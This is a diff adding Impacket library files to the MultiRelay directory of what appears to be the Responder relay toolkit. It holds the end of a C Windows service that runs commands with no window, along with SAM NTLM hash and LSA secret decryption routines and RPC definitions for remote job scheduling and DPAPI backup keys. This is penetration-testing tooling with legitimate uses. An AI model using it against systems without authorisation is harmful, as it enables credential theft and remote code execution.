+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+
+			if(CreateProcess(NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+			{
+				CloseHandle(pi.hThread);
+				CloseHandle(pi.hProcess);
+			}
+
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}
--- a/tools/MultiRelay/impacket-dev/LICENSE
+++ b/tools/MultiRelay/impacket-dev/LICENSE
@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation.  All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in
+   the documentation and/or other materials provided with the
+   distribution.
+
+3. The end-user documentation included with the redistribution,
+   if any, must include the following acknowledgment:
+      "This product includes software developed by
+       SecureAuth Corporation (https://www.secureauth.com/)."
+   Alternately, this acknowledgment may appear in the software itself,
+   if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+   not be used to endorse or promote products derived from this
+   software without prior written permission. For written
+   permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+   nor may "Impacket" appear in their name, without prior written
+   permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty.  In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+   not claim that you wrote the original software. If you use this
+   software in a product, an acknowledgment in the product
+   documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+   not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+   distribution.
--- a/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py
+++ b/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py
--- a/tools/MultiRelay/impacket-dev/impacket/init.py
+++ b/tools/MultiRelay/impacket-dev/impacket/init.py
@@ -0,0 +1,25 @@
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+
+# Set default logging handler to avoid "No handler found" warnings.
+import logging
+try:  # Python 2.7+
+    from logging import NullHandler
+except ImportError:
+    class NullHandler(logging.Handler):
+        def emit(self, record):
+            pass
+
+# All modules inside this library MUST use this logger (impacket)
+# It is up to the library consumer to do whatever is wanted 
+# with the logger output. By default it is forwarded to the 
+# upstream logger
+
+LOG = logging.getLogger(__name__)
+LOG.addHandler(NullHandler())
--- a/tools/MultiRelay/impacket-dev/impacket/crypto.py
+++ b/tools/MultiRelay/impacket-dev/impacket/crypto.py
@@ -0,0 +1,346 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+#   RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)
+#   RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)
+#
+#   NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation
+#   (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)
+#
+#   [MS-LSAD] Section 5.1.2
+#   [MS-SAMR] Section 2.2.11.1.1
+
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from Cryptodome.Cipher import DES, AES
+except Exception:
+    LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
+    LOG.error("See https://pypi.org/project/pycryptodomex/")
+from struct import pack, unpack
+from impacket.structure import Structure
+import hmac, hashlib
+from six import b
+
+def Generate_Subkey(K):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                    Algorithm Generate_Subkey                      +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K (128-bit key)                                      +
+#   +   Output   : K1 (128-bit first subkey)                            +
+#   +              K2 (128-bit second subkey)                           +
+#   +-------------------------------------------------------------------+
+#   +                                                                   +
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Rb   is 0x00000000000000000000000000000087     +
+#   +   Variables: L          for output of AES-128 applied to 0^128    +
+#   +                                                                   +
+#   +   Step 1.  L := AES-128(K, const_Zero);                           +
+#   +   Step 2.  if MSB(L) is equal to 0                                +
+#   +            then    K1 := L << 1;                                  +
+#   +            else    K1 := (L << 1) XOR const_Rb;                   +
+#   +   Step 3.  if MSB(K1) is equal to 0                               +
+#   +            then    K2 := K1 << 1;                                 +
+#   +            else    K2 := (K1 << 1) XOR const_Rb;                  +
+#   +   Step 4.  return K1, K2;                                         +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    AES_128 = AES.new(K, AES.MODE_ECB)
+
+    L = AES_128.encrypt(bytes(bytearray(16)))
+
+    LHigh = unpack('>Q',L[:8])[0]
+    LLow  = unpack('>Q',L[8:])[0]
+
+    K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF
+    K1Low  = (LLow << 1) & 0xFFFFFFFFFFFFFFFF
+
+    if (LHigh >> 63):
+        K1Low ^= 0x87
+
+    K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF
+    K2Low  = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF
+
+    if (K1High >> 63):
+        K2Low ^= 0x87
+
+    K1 = bytearray(pack('>QQ', K1High, K1Low))
+    K2 = bytearray(pack('>QQ', K2High, K2Low))
+
+    return K1, K2
+
+def XOR_128(N1,N2):
+
+    J = bytearray()
+    for i in range(len(N1)):
+        #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))
+        J.append(N1[i] ^ N2[i])
+    return J
+
+def PAD(N):
+    padLen = 16-len(N)
+    return  N + b'\x80' + b'\x00'*(padLen-1)
+
+def AES_CMAC(K, M, length):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                   Algorithm AES-CMAC                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K    ( 128-bit key )                                 +
+#   +            : M    ( message to be authenticated )                 +
+#   +            : len  ( length of the message in octets )             +
+#   +   Output   : T    ( message authentication code )                 +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Bsize is 16                                    +
+#   +                                                                   +
+#   +   Variables: K1, K2 for 128-bit subkeys                           +
+#   +              M_i is the i-th block (i=1..ceil(len/const_Bsize))   +
+#   +              M_last is the last block xor-ed with K1 or K2        +
+#   +              n      for number of blocks to be processed          +
+#   +              r      for number of octets of last block            +
+#   +              flag   for denoting if last block is complete or not +
+#   +                                                                   +
+#   +   Step 1.  (K1,K2) := Generate_Subkey(K);                         +
+#   +   Step 2.  n := ceil(len/const_Bsize);                            +
+#   +   Step 3.  if n = 0                                               +
+#   +            then                                                   +
+#   +                 n := 1;                                           +
+#   +                 flag := false;                                    +
+#   +            else                                                   +
+#   +                 if len mod const_Bsize is 0                       +
+#   +                 then flag := true;                                +
+#   +                 else flag := false;                               +
+#   +                                                                   +
+#   +   Step 4.  if flag is true                                        +
+#   +            then M_last := M_n XOR K1;                             +
+#   +            else M_last := padding(M_n) XOR K2;                    +
+#   +   Step 5.  X := const_Zero;                                       +
+#   +   Step 6.  for i := 1 to n-1 do                                   +
+#   +                begin                                              +
+#   +                  Y := X XOR M_i;                                  +
+#   +                  X := AES-128(K,Y);                               +
+#   +                end                                                +
+#   +            Y := M_last XOR X;                                     +
+#   +            T := AES-128(K,Y);                                     +
+#   +   Step 7.  return T;                                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    const_Bsize = 16
+    const_Zero  = bytearray(16)
+
+    AES_128= AES.new(K, AES.MODE_ECB)
+    M      = bytearray(M[:length])
+    K1, K2 = Generate_Subkey(K)
+    n      = len(M)//const_Bsize
+
+    if n == 0:
+        n = 1
+        flag = False
+    else:
+        if (length % const_Bsize) == 0:
+            flag = True
+        else:
+            n += 1
+            flag = False
+
+    M_n = M[(n-1)*const_Bsize:]
+    if flag is True:
+        M_last = XOR_128(M_n,K1)
+    else:
+        M_last = XOR_128(PAD(M_n),K2)
+
+    X = const_Zero
+    for i in range(n-1):
+        M_i = M[(i)*const_Bsize:][:16]
+        Y   = XOR_128(X, M_i)
+        X   = bytearray(AES_128.encrypt(bytes(Y)))
+    Y = XOR_128(M_last, X)
+    T = AES_128.encrypt(bytes(Y))
+
+    return T
+
+def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                        AES-CMAC-PRF-128                           +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   + Input  : VK (Variable-length key)                                 +
+#   +        : M (Message, i.e., the input data of the PRF)             +
+#   +        : VKlen (length of VK in octets)                           +
+#   +        : len (length of M in octets)                              +
+#   + Output : PRV (128-bit Pseudo-Random Variable)                     +
+#   +                                                                   +
+#   +-------------------------------------------------------------------+
+#   + Variable: K (128-bit key for AES-CMAC)                            +
+#   +                                                                   +
+#   + Step 1.   If VKlen is equal to 16                                 +
+#   + Step 1a.  then                                                    +
+#   +               K := VK;                                            +
+#   + Step 1b.  else                                                    +
+#   +               K := AES-CMAC(0^128, VK, VKlen);                    +
+#   + Step 2.   PRV := AES-CMAC(K, M, len);                             +
+#   +           return PRV;                                             +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    if VKlen == 16:
+        K = VK
+    else:
+        K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)
+
+    PRV = AES_CMAC(K, M, Mlen)
+
+    return PRV
+
+def KDF_CounterMode(KI, Label, Context, L):
+# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256
+# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108
+# Fixed values:
+#  1. h - The length of the output of the PRF in bits, and
+#  2. r - The length of the binary representation of the counter i.
+# Input: KI, Label, Context, and L.
+# Process:
+#  1. n := [L/h]
+#  2. If n > 2r-1, then indicate an error and stop.
+#  3. result(0):= empty .
+#  4. For i = 1 to n, do
+#    a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)
+#    b. result(i) := result(i-1) || K(i).
+#  5. Return: KO := the leftmost L bits of result(n).
+    h = 256
+    r = 32
+
+    n = L // h
+
+    if n == 0:
+        n = 1
+
+    if n > (pow(2,r)-1):
+        raise Exception("Error computing KDF_CounterMode")
+
+    result = b''
+    K      = b''
+
+    for i in range(1,n+1):
+       input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L)
+       K = hmac.new(KI, input, hashlib.sha256).digest()
+       result = result + K
+
+    return result[:(L//8)]
+
+# [MS-LSAD] Section 5.1.2 / 5.1.3
+class LSA_SECRET_XP(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Version','<L=0'),
+        ('_Secret','_-Secret', 'self["Length"]'),
+        ('Secret', ':'),
+    )
+
+
+def transformKey(InputKey):
+    # Section 5.1.3
+    OutputKey = []
+    OutputKey.append( chr(ord(InputKey[0:1]) >> 0x01) )
+    OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )
+    OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )
+    OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )
+    OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )
+    OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )
+    OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )
+    OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )
+
+    for i in range(8):
+        OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
+
+    return b("".join(OutputKey))
+
+def decryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    plainText = b''
+    key0 = key
+    for i in range(0, len(value), 8):
+        cipherText = value[:8]
+        tmpStrKey = key0[:7]
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        plainText += Crypt1.decrypt(cipherText)
+        key0 = key0[7:]
+        value = value[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    secret = LSA_SECRET_XP(plainText)
+    return (secret['Secret'])
+
+def encryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    cipherText = b''
+    key0 = key
+    value0 = pack('<LL', len(value), 1) + value
+    for i in range(0, len(value0), 8):
+        if len(value0) < 8:
+            value0 = value0 + b'\x00'*(8-len(value0))
+        plainText = value0[:8]
+        tmpStrKey = key0[:7]
+        print(type(tmpStrKey))
+        print(tmpStrKey)
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        cipherText += Crypt1.encrypt(plainText)
+        key0 = key0[7:]
+        value0 = value0[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    return cipherText
+
+def SamDecryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.decrypt(Block1)
+    plain2 = Crypt2.decrypt(Block2)
+
+    return plain1 + plain2
+
+def SamEncryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.encrypt(Block1)
+    plain2 = Crypt2.encrypt(Block2)
+
+    return plain1 + plain2
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/init.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/init.py
@@ -0,0 +1 @@
+pass
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/init.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/init.py
@@ -0,0 +1 @@
+pass
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/atsvc.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/atsvc.py
@@ -0,0 +1,211 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ATSVC Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_ATSVC  = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+ATSVC_HANDLE = LPWSTR
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.4 AT_INFO
+class AT_INFO(NDRSTRUCT):
+    structure =  (
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class LPAT_INFO(NDRPOINTER):
+    referent = (
+        ('Data',AT_INFO),
+    )
+
+# 2.3.6 AT_ENUM
+class AT_ENUM(NDRSTRUCT):
+    structure =  (
+        ('JobId',DWORD),
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class AT_ENUM_ARRAY(NDRUniConformantArray):
+    item = AT_ENUM
+
+class LPAT_ENUM_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',AT_ENUM_ARRAY),
+    )
+
+# 2.3.5 AT_ENUM_CONTAINER
+class AT_ENUM_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('EntriesRead',DWORD),
+        ('Buffer',LPAT_ENUM_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.2.1 NetrJobAdd (Opnum 0)
+class NetrJobAdd(NDRCALL):
+    opnum = 0
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pAtInfo', AT_INFO),
+    )
+
+class NetrJobAddResponse(NDRCALL):
+    structure = (
+        ('pJobId',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.2 NetrJobDel (Opnum 1)
+class NetrJobDel(NDRCALL):
+    opnum = 1
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('MinJobId', DWORD),
+        ('MaxJobId', DWORD),
+    )
+
+class NetrJobDelResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.3 NetrJobEnum (Opnum 2)
+class NetrJobEnum(NDRCALL):
+    opnum = 2
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('PreferedMaximumLength', DWORD),
+        ('pResumeHandle', DWORD),
+    )
+
+class NetrJobEnumResponse(NDRCALL):
+    structure = (
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('pTotalEntries', DWORD),
+        ('pResumeHandle',LPDWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)
+class NetrJobGetInfo(NDRCALL):
+    opnum = 3
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('JobId', DWORD),
+    )
+
+class NetrJobGetInfoResponse(NDRCALL):
+    structure = (
+        ('ppAtInfo', LPAT_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrJobAdd,NetrJobAddResponse ),
+ 1 : (NetrJobDel,NetrJobDelResponse ),
+ 2 : (NetrJobEnum,NetrJobEnumResponse ),
+ 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
+    netrJobAdd = NetrJobAdd()
+    netrJobAdd['ServerName'] = serverName
+    netrJobAdd['pAtInfo'] = atInfo
+    return dce.request(netrJobAdd)
+
+def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
+    netrJobDel = NetrJobDel()
+    netrJobDel['ServerName'] = serverName
+    netrJobDel['MinJobId'] = minJobId
+    netrJobDel['MaxJobId'] = maxJobId
+    return dce.request(netrJobDel)
+
+def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):
+    netrJobEnum = NetrJobEnum()
+    netrJobEnum['ServerName'] = serverName
+    netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer
+    netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength
+    return dce.request(netrJobEnum)
+
+def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
+    netrJobGetInfo = NetrJobGetInfo()
+    netrJobGetInfo['ServerName'] = serverName
+    netrJobGetInfo['JobId'] = jobId
+    return dce.request(netrJobGetInfo)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py
@@ -0,0 +1,127 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-BKRP] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+# ToDo:
+# [ ] 2.2.2 Client-Side-Wrapped Secret
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967")
+BACKUPKEY_RESTORE_GUID =  string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A")
+
+################################################################################
+# STRUCTURES
+################################################################################
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+# 2.2.4.1 Rc4EncryptedPayload Structure
+class Rc4EncryptedPayload(Structure):
+    structure = (
+        ('R3', '32s=""'),
+        ('MAC', '20s=""'),
+        ('SID', ':', RPC_SID),
+        ('Secret', ':'),
+    )
+
+# 2.2.4 Secret Wrapped with Symmetric Key
+class WRAPPED_SECRET(Structure):
+    structure = (
+        ('SIGNATURE', '<L=1'),
+        ('Payload_Length', '<L=0'),
+        ('Ciphertext_Length', '<L=0'),
+        ('GUID_of_Wrapping_Key', '16s=""'),
+        ('R2', '68s=""'),
+        ('_Rc4EncryptedPayload', '_-Rc4EncryptedPayload', 'self["Payload_Length"]'),
+        ('Rc4EncryptedPayload', ':'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
